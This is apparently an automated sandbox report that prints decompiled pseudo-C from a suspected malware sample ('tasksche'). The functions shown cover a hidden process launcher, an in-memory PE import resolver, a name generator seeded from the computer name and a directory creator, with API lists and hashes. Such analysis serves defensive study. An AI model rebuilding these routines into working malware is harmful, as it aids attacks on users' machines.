                                                          				_v88.dwFlags = _t37;
                                                          				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
                                                          					return 0;
                                                          				}
                                                          				if(_a8 != 0) {
                                                          					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
                                                          						TerminateProcess(_v20.hProcess, 0xffffffff);
                                                          					}
                                                          					if(_a12 != 0) {
                                                          						GetExitCodeProcess(_v20.hProcess, _a12);
                                                          					}
                                                          				}
                                                          				CloseHandle(_v20);
                                                          				CloseHandle(_v20.hThread);
                                                          				return _t37;
                                                          			}







                                                          0x00401070
                                                          0x00401074
                                                          0x0040107d
                                                          0x00401082
                                                          0x00401085
                                                          0x00401086
                                                          0x00401087
                                                          0x0040108d
                                                          0x0040108e
                                                          0x004010a1
                                                          0x004010b0
                                                          0x00000000
                                                          0x004010f7
                                                          0x004010b5
                                                          0x004010c5
                                                          0x004010cc
                                                          0x004010cc
                                                          0x004010d5
                                                          0x004010dd
                                                          0x004010dd
                                                          0x004010d5
                                                          0x004010ec
                                                          0x004010f1
                                                          0x00000000

                                                          APIs
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
                                                          • WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
                                                          • TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
                                                          • CloseHandle.KERNEL32(?), ref: 004010EC
                                                          • CloseHandle.KERNEL32(?), ref: 004010F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                                          • String ID: D
                                                          • API String ID: 786732093-2746444292
                                                          • Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                          • Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
                                                          • Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                          • Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 81%
                                                          			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                          				CHAR* _v8;
                                                          				intOrPtr* _v24;
                                                          				intOrPtr _v28;
                                                          				struct _STARTUPINFOA _v96;
                                                          				int _v100;
                                                          				char** _v104;
                                                          				int _v108;
                                                          				void _v112;
                                                          				char** _v116;
                                                          				intOrPtr* _v120;
                                                          				intOrPtr _v124;
                                                          				intOrPtr* _t23;
                                                          				intOrPtr* _t24;
                                                          				void* _t27;
                                                          				void _t29;
                                                          				intOrPtr _t36;
                                                          				signed int _t38;
                                                          				int _t40;
                                                          				intOrPtr* _t41;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t46;
                                                          				intOrPtr _t47;
                                                          				intOrPtr _t49;
                                                          				intOrPtr* _t55;
                                                          				intOrPtr _t58;
                                                          				intOrPtr _t61;
                                                          
                                                          				_push(0xffffffff);
                                                          				_push(0x40d488);
                                                          				_push(0x4076f4);
                                                          				_push( *[fs:0x0]);
                                                          				 *[fs:0x0] = _t58;
                                                          				_v28 = _t58 - 0x68;
                                                          				_v8 = 0;
                                                          				__set_app_type(2);
                                                          				 *0x40f94c =  *0x40f94c | 0xffffffff;
                                                          				 *0x40f950 =  *0x40f950 | 0xffffffff;
                                                          				_t23 = __p__fmode();
                                                          				_t46 =  *0x40f948; // 0x0
                                                          				 *_t23 = _t46;
                                                          				_t24 = __p__commode();
                                                          				_t47 =  *0x40f944; // 0x0
                                                          				 *_t24 = _t47;
                                                          				 *0x40f954 = _adjust_fdiv;
                                                          				_t27 = E0040793F( *_adjust_fdiv);
                                                          				_t61 =  *0x40f870; // 0x1
                                                          				if(_t61 == 0) {
                                                          					__setusermatherr(E0040793C);
                                                          				}
                                                          				E0040792A(_t27);
                                                          				_push(0x40e00c);
                                                          				_push(0x40e008);
                                                          				L00407924();
                                                          				_t29 =  *0x40f940; // 0x0
                                                          				_v112 = _t29;
                                                          				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
                                                          				_push(0x40e004);
                                                          				_push(0x40e000);
                                                          				L00407924();
                                                          				_t55 =  *_acmdln;
                                                          				_v120 = _t55;
                                                          				if( *_t55 != 0x22) {
                                                          					while(1) {
                                                          						__eflags =  *_t55 - 0x20;
                                                          						if(__eflags <= 0) {
                                                          							goto L7;
                                                          						}
                                                          						_t55 = _t55 + 1;
                                                          						_v120 = _t55;
                                                          					}
                                                          				} else {
                                                          					do {
                                                          						_t55 = _t55 + 1;
                                                          						_v120 = _t55;
                                                          						_t42 =  *_t55;
                                                          					} while (_t42 != 0 && _t42 != 0x22);
                                                          					if( *_t55 == 0x22) {
                                                          						L6:
                                                          						_t55 = _t55 + 1;
                                                          						_v120 = _t55;
                                                          					}
                                                          				}
                                                          				L7:
                                                          				_t36 =  *_t55;
                                                          				if(_t36 != 0 && _t36 <= 0x20) {
                                                          					goto L6;
                                                          				}
                                                          				_v96.dwFlags = 0;
                                                          				GetStartupInfoA( &_v96);
                                                          				_t69 = _v96.dwFlags & 0x00000001;
                                                          				if((_v96.dwFlags & 0x00000001) == 0) {
                                                          					_t38 = 0xa;
                                                          				} else {
                                                          					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                          				}
                                                          				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
                                                          				_v108 = _t40;
                                                          				exit(_t40);
                                                          				_t41 = _v24;
                                                          				_t49 =  *((intOrPtr*)( *_t41));
                                                          				_v124 = _t49;
                                                          				_push(_t41);
                                                          				_push(_t49);
                                                          				L0040791E();
                                                          				return _t41;
                                                          			}





























                                                          0x004077bd
                                                          0x004077bf
                                                          0x004077c4
                                                          0x004077cf
                                                          0x004077d0
                                                          0x004077dd
                                                          0x004077e2
                                                          0x004077e7
                                                          0x004077ee
                                                          0x004077f5
                                                          0x004077fc
                                                          0x00407802
                                                          0x00407808
                                                          0x0040780a
                                                          0x00407810
                                                          0x00407816
                                                          0x0040781f
                                                          0x00407824
                                                          0x00407829
                                                          0x0040782f
                                                          0x00407836
                                                          0x0040783c
                                                          0x0040783d
                                                          0x00407842
                                                          0x00407847
                                                          0x0040784c
                                                          0x00407851
                                                          0x00407856
                                                          0x0040786f
                                                          0x00407875
                                                          0x0040787a
                                                          0x0040787f
                                                          0x0040788c
                                                          0x0040788e
                                                          0x00407894
                                                          0x004078d0
                                                          0x004078d0
                                                          0x004078d3
                                                          0x00000000
                                                          0x00000000
                                                          0x004078d5
                                                          0x004078d6
                                                          0x004078d6
                                                          0x00407896
                                                          0x00407896
                                                          0x00407896
                                                          0x00407897
                                                          0x0040789a
                                                          0x0040789c
                                                          0x004078a7
                                                          0x004078a9
                                                          0x004078a9
                                                          0x004078aa
                                                          0x004078aa
                                                          0x004078a7
                                                          0x004078ad
                                                          0x004078ad
                                                          0x004078b1
                                                          0x00000000
                                                          0x00000000
                                                          0x004078b7
                                                          0x004078be
                                                          0x004078c4
                                                          0x004078c8
                                                          0x004078dd
                                                          0x004078ca
                                                          0x004078ca
                                                          0x004078ca
                                                          0x004078e9
                                                          0x004078ee
                                                          0x004078f2
                                                          0x004078f8
                                                          0x004078fd
                                                          0x004078ff
                                                          0x00407902
                                                          0x00407903
                                                          0x00407904
                                                          0x0040790b

                                                          APIs
                                                          • __set_app_type.MSVCRT(00000002), ref: 004077E7
                                                          • __p__fmode.MSVCRT ref: 004077FC
                                                          • __p__commode.MSVCRT ref: 0040780A
                                                          • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                          • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                          • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
                                                          • String ID:
                                                          • API String ID: 3626615345-0
                                                          • Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                          • Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
                                                          • Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                          • Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E00407831(CHAR* __ebx) {
                                                          				void* _t19;
                                                          				void _t21;
                                                          				intOrPtr _t28;
                                                          				signed int _t30;
                                                          				int _t32;
                                                          				intOrPtr* _t33;
                                                          				intOrPtr _t34;
                                                          				CHAR* _t35;
                                                          				intOrPtr _t38;
                                                          				intOrPtr* _t41;
                                                          				void* _t42;
                                                          
                                                          				_t35 = __ebx;
                                                          				__setusermatherr(E0040793C);
                                                          				E0040792A(_t19);
                                                          				_push(0x40e00c);
                                                          				_push(0x40e008);
                                                          				L00407924();
                                                          				_t21 =  *0x40f940; // 0x0
                                                          				 *(_t42 - 0x6c) = _t21;
                                                          				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
                                                          				_push(0x40e004);
                                                          				_push(0x40e000);
                                                          				L00407924();
                                                          				_t41 =  *_acmdln;
                                                          				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                          				if( *_t41 != 0x22) {
                                                          					while(1) {
                                                          						__eflags =  *_t41 - 0x20;
                                                          						if(__eflags <= 0) {
                                                          							goto L6;
                                                          						}
                                                          						_t41 = _t41 + 1;
                                                          						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                          					}
                                                          				} else {
                                                          					do {
                                                          						_t41 = _t41 + 1;
                                                          						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                          						_t34 =  *_t41;
                                                          					} while (_t34 != _t35 && _t34 != 0x22);
                                                          					if( *_t41 == 0x22) {
                                                          						L5:
                                                          						_t41 = _t41 + 1;
                                                          						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                          					}
                                                          				}
                                                          				L6:
                                                          				_t28 =  *_t41;
                                                          				if(_t28 != _t35 && _t28 <= 0x20) {
                                                          					goto L5;
                                                          				}
                                                          				 *(_t42 - 0x30) = _t35;
                                                          				GetStartupInfoA(_t42 - 0x5c);
                                                          				_t52 =  *(_t42 - 0x30) & 0x00000001;
                                                          				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
                                                          					_t30 = 0xa;
                                                          				} else {
                                                          					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
                                                          				}
                                                          				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
                                                          				 *(_t42 - 0x68) = _t32;
                                                          				exit(_t32);
                                                          				_t33 =  *((intOrPtr*)(_t42 - 0x14));
                                                          				_t38 =  *((intOrPtr*)( *_t33));
                                                          				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
                                                          				_push(_t33);
                                                          				_push(_t38);
                                                          				L0040791E();
                                                          				return _t33;
                                                          			}














                                                          0x00407831
                                                          0x00407836
                                                          0x0040783d
                                                          0x00407842
                                                          0x00407847
                                                          0x0040784c
                                                          0x00407851
                                                          0x00407856
                                                          0x0040786f
                                                          0x00407875
                                                          0x0040787a
                                                          0x0040787f
                                                          0x0040788c
                                                          0x0040788e
                                                          0x00407894
                                                          0x004078d0
                                                          0x004078d0
                                                          0x004078d3
                                                          0x00000000
                                                          0x00000000
                                                          0x004078d5
                                                          0x004078d6
                                                          0x004078d6
                                                          0x00407896
                                                          0x00407896
                                                          0x00407896
                                                          0x00407897
                                                          0x0040789a
                                                          0x0040789c
                                                          0x004078a7
                                                          0x004078a9
                                                          0x004078a9
                                                          0x004078aa
                                                          0x004078aa
                                                          0x004078a7
                                                          0x004078ad
                                                          0x004078ad
                                                          0x004078b1
                                                          0x00000000
                                                          0x00000000
                                                          0x004078b7
                                                          0x004078be
                                                          0x004078c4
                                                          0x004078c8
                                                          0x004078dd
                                                          0x004078ca
                                                          0x004078ca
                                                          0x004078ca
                                                          0x004078e9
                                                          0x004078ee
                                                          0x004078f2
                                                          0x004078f8
                                                          0x004078fd
                                                          0x004078ff
                                                          0x00407902
                                                          0x00407903
                                                          0x00407904
                                                          0x0040790b

                                                          APIs
                                                          • __setusermatherr.MSVCRT(0040793C), ref: 00407836
                                                            • Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934
                                                          • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                          • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                          • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                          • GetStartupInfoA.KERNEL32(?), ref: 004078BE
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
                                                          • exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
                                                          • _XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
                                                          • String ID:
                                                          • API String ID: 2141228402-0
                                                          • Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                          • Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
                                                          • Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                          • Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E004027DF(signed int* _a4) {
                                                          				intOrPtr _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr* _t50;
                                                          				intOrPtr _t53;
                                                          				intOrPtr _t55;
                                                          				void* _t58;
                                                          				void _t60;
                                                          				signed int _t63;
                                                          				signed int _t67;
                                                          				intOrPtr _t68;
                                                          				void* _t73;
                                                          				signed int _t75;
                                                          				intOrPtr _t87;
                                                          				intOrPtr* _t88;
                                                          				intOrPtr* _t90;
                                                          				void* _t91;
                                                          
                                                          				_t90 = _a4;
                                                          				_t2 = _t90 + 4; // 0x4be8563c
                                                          				_t87 =  *_t2;
                                                          				_t50 =  *_t90 + 0x80;
                                                          				_t75 = 1;
                                                          				_v16 = _t87;
                                                          				_v12 = _t75;
                                                          				if( *((intOrPtr*)(_t50 + 4)) != 0) {
                                                          					_t73 =  *_t50 + _t87;
                                                          					if(IsBadReadPtr(_t73, 0x14) != 0) {
                                                          						L25:
                                                          						return _v12;
                                                          					}
                                                          					while(1) {
                                                          						_t53 =  *((intOrPtr*)(_t73 + 0xc));
                                                          						if(_t53 == 0) {
                                                          							goto L25;
                                                          						}
                                                          						_t8 = _t90 + 0x30; // 0xc085d0ff
                                                          						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
                                                          						_v8 = _t55;
                                                          						if(_t55 == 0) {
                                                          							SetLastError(0x7e);
                                                          							L23:
                                                          							_v12 = _v12 & 0x00000000;
                                                          							goto L25;
                                                          						}
                                                          						_t11 = _t90 + 0xc; // 0x317459c0
                                                          						_t14 = _t90 + 8; // 0x85000001
                                                          						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
                                                          						if(_t58 == 0) {
                                                          							_t40 = _t90 + 0x30; // 0xc085d0ff
                                                          							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
                                                          							SetLastError(0xe);
                                                          							goto L23;
                                                          						}
                                                          						_t15 = _t90 + 0xc; // 0x317459c0
                                                          						 *(_t90 + 8) = _t58;
                                                          						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
                                                          						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
                                                          						_t60 =  *_t73;
                                                          						if(_t60 == 0) {
                                                          							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
                                                          							_a4 = _t88;
                                                          						} else {
                                                          							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
                                                          							_a4 = _t60 + _t87;
                                                          						}
                                                          						while(1) {
                                                          							_t63 =  *_a4;
                                                          							if(_t63 == 0) {
                                                          								break;
                                                          							}
                                                          							if((_t63 & 0x80000000) == 0) {
                                                          								_t32 = _t90 + 0x30; // 0xc085d0ff
                                                          								_push( *_t32);
                                                          								_t67 = _t63 + _v16 + 2;
                                                          							} else {
                                                          								_t30 = _t90 + 0x30; // 0xc085d0ff
                                                          								_push( *_t30);
                                                          								_t67 = _t63 & 0x0000ffff;
                                                          							}
                                                          							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
                                                          							_t91 = _t91 + 0xc;
                                                          							 *_t88 = _t68;
                                                          							if(_t68 == 0) {
                                                          								_v12 = _v12 & 0x00000000;
                                                          								break;
                                                          							} else {
                                                          								_a4 =  &(_a4[1]);
                                                          								_t88 = _t88 + 4;
                                                          								continue;
                                                          							}
                                                          						}
                                                          						if(_v12 == 0) {
                                                          							_t45 = _t90 + 0x30; // 0xc085d0ff
                                                          							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
                                                          							SetLastError(0x7f);
                                                          							goto L25;
                                                          						}
                                                          						_t73 = _t73 + 0x14;
                                                          						if(IsBadReadPtr(_t73, 0x14) == 0) {
                                                          							_t87 = _v16;
                                                          							continue;
                                                          						}
                                                          						goto L25;
                                                          					}
                                                          					goto L25;
                                                          				}
                                                          				return _t75;
                                                          			}




















                                                          0x004027e6
                                                          0x004027ee
                                                          0x004027ee
                                                          0x004027f1
                                                          0x004027f6
                                                          0x004027f7
                                                          0x004027fa
                                                          0x00402801
                                                          0x0040280d
                                                          0x0040281a
                                                          0x0040291c
                                                          0x00000000
                                                          0x0040291f
                                                          0x00402825
                                                          0x00402825
                                                          0x0040282a
                                                          0x00000000
                                                          0x00000000
                                                          0x00402830
                                                          0x00402836
                                                          0x0040283a
                                                          0x00402840
                                                          0x004028fd
                                                          0x004028fd
                                                          0x00402903
                                                          0x00000000
                                                          0x00402903
                                                          0x00402846
                                                          0x00402851
                                                          0x00402854
                                                          0x0040285e
                                                          0x004028f0
                                                          0x004028f6
                                                          0x004028fd
                                                          0x00000000
                                                          0x004028fd
                                                          0x00402864
                                                          0x0040286a
                                                          0x0040286d
                                                          0x00402870
                                                          0x00402873
                                                          0x00402877
                                                          0x00402889
                                                          0x0040288b
                                                          0x00402879
                                                          0x0040287e
                                                          0x00402881
                                                          0x00402881
                                                          0x0040288e
                                                          0x00402891
                                                          0x00402895
                                                          0x00000000
                                                          0x00000000
                                                          0x0040289c
                                                          0x004028ab
                                                          0x004028ab
                                                          0x004028b0
                                                          0x0040289e
                                                          0x0040289e
                                                          0x0040289e
                                                          0x004028a1
                                                          0x004028a1
                                                          0x004028b7
                                                          0x004028ba
                                                          0x004028bd
                                                          0x004028c1
                                                          0x004028cc
                                                          0x00000000
                                                          0x004028c3
                                                          0x004028c3
                                                          0x004028c7
                                                          0x00000000
                                                          0x004028c7
                                                          0x004028c1
                                                          0x004028d4
                                                          0x00402909
                                                          0x0040290f
                                                          0x00402916
                                                          0x00000000
                                                          0x00402916
                                                          0x004028d6
                                                          0x004028e4
                                                          0x00402822
                                                          0x00000000
                                                          0x00402822
                                                          0x00000000
                                                          0x004028ea
                                                          0x00000000
                                                          0x00402825
                                                          0x00000000

                                                          APIs
                                                          • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
                                                          • realloc.MSVCRT(85000001,317459C0), ref: 00402854
                                                          • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Read$realloc
                                                          • String ID: ?!@
                                                          • API String ID: 1241503663-708128716
                                                          • Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                          • Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
                                                          • Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                          • Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E00401225(intOrPtr _a4) {
                                                          				signed int _v8;
                                                          				long _v12;
                                                          				void _v410;
                                                          				long _v412;
                                                          				long _t34;
                                                          				signed int _t42;
                                                          				intOrPtr _t44;
                                                          				signed int _t45;
                                                          				signed int _t48;
                                                          				int _t54;
                                                          				signed int _t56;
                                                          				signed int _t60;
                                                          				signed int _t61;
                                                          				signed int _t62;
                                                          				void* _t71;
                                                          				signed short* _t72;
                                                          				void* _t76;
                                                          				void* _t77;
                                                          
                                                          				_t34 =  *0x40f874; // 0x0
                                                          				_v412 = _t34;
                                                          				_t56 = 0x63;
                                                          				_v12 = 0x18f;
                                                          				memset( &_v410, 0, _t56 << 2);
                                                          				asm("stosw");
                                                          				GetComputerNameW( &_v412,  &_v12);
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t54 = 1;
                                                          				if(wcslen( &_v412) > 0) {
                                                          					_t72 =  &_v412;
                                                          					do {
                                                          						_t54 = _t54 * ( *_t72 & 0x0000ffff);
                                                          						_v8 = _v8 + 1;
                                                          						_t72 =  &(_t72[1]);
                                                          					} while (_v8 < wcslen( &_v412));
                                                          				}
                                                          				srand(_t54);
                                                          				_t42 = rand();
                                                          				_t71 = 0;
                                                          				asm("cdq");
                                                          				_t60 = 8;
                                                          				_t76 = _t42 % _t60 + _t60;
                                                          				if(_t76 > 0) {
                                                          					do {
                                                          						_t48 = rand();
                                                          						asm("cdq");
                                                          						_t62 = 0x1a;
                                                          						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
                                                          						_t71 = _t71 + 1;
                                                          					} while (_t71 < _t76);
                                                          				}
                                                          				_t77 = _t76 + 3;
                                                          				while(_t71 < _t77) {
                                                          					_t45 = rand();
                                                          					asm("cdq");
                                                          					_t61 = 0xa;
                                                          					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
                                                          					_t71 = _t71 + 1;
                                                          				}
                                                          				_t44 = _a4;
                                                          				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
                                                          				return _t44;
                                                          			}





















                                                          0x0040122e
                                                          0x00401239
                                                          0x00401240
                                                          0x00401249
                                                          0x00401250
                                                          0x00401252
                                                          0x0040125f
                                                          0x0040126b
                                                          0x00401277
                                                          0x0040127e
                                                          0x00401280
                                                          0x00401286
                                                          0x00401289
                                                          0x0040128c
                                                          0x00401297
                                                          0x0040129d
                                                          0x00401286
                                                          0x004012a1
                                                          0x004012ae
                                                          0x004012b2
                                                          0x004012b4
                                                          0x004012b5
                                                          0x004012ba
                                                          0x004012be
                                                          0x004012c0
                                                          0x004012c0
                                                          0x004012c4
                                                          0x004012c5
                                                          0x004012ce
                                                          0x004012d1
                                                          0x004012d2
                                                          0x004012c0
                                                          0x004012d6
                                                          0x004012d9
                                                          0x004012dd
                                                          0x004012e1
                                                          0x004012e2
                                                          0x004012eb
                                                          0x004012ee
                                                          0x004012ee
                                                          0x004012f1
                                                          0x004012f4
                                                          0x004012fc

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: rand$wcslen$ComputerNamesrand
                                                          • String ID:
                                                          • API String ID: 3058258771-0
                                                          • Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                          • Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
                                                          • Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                          • Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00407070(char* _a4, char* _a8) {
                                                          				char _v264;
                                                          				void _v524;
                                                          				long _t16;
                                                          				char* _t30;
                                                          				char* _t31;
                                                          				char* _t36;
                                                          				char* _t38;
                                                          				int _t40;
                                                          				void* _t41;
                                                          
                                                          				_t30 = _a4;
                                                          				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
                                                          					CreateDirectoryA(_t30, 0);
                                                          				}
                                                          				_t36 = _a8;
                                                          				_t16 =  *_t36;
                                                          				if(_t16 != 0) {
                                                          					_t38 = _t36;
                                                          					_t31 = _t36;
                                                          					do {
                                                          						if(_t16 == 0x2f || _t16 == 0x5c) {
                                                          							_t38 = _t31;
                                                          						}
                                                          						_t16 = _t31[1];
                                                          						_t31 =  &(_t31[1]);
                                                          					} while (_t16 != 0);
                                                          					if(_t38 != _t36) {
                                                          						_t40 = _t38 - _t36;
                                                          						memcpy( &_v524, _t36, _t40);
                                                          						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
                                                          						E00407070(_t30,  &_v524);
                                                          					}
                                                          					_v264 = _v264 & 0x00000000;
                                                          					if(_t30 != 0) {
                                                          						strcpy( &_v264, _t30);
                                                          					}
                                                          					strcat( &_v264, _t36);
                                                          					_t16 = GetFileAttributesA( &_v264);
                                                          					if(_t16 == 0xffffffff) {
                                                          						return CreateDirectoryA( &_v264, 0);
                                                          					}
                                                          				}
                                                          				return _t16;
                                                          			}












                                                          0x0040707a
                                                          0x00407080
                                                          0x00407091
                                                          0x00407091
                                                          0x00407097
                                                          0x0040709a
                                                          0x0040709e
                                                          0x004070a5
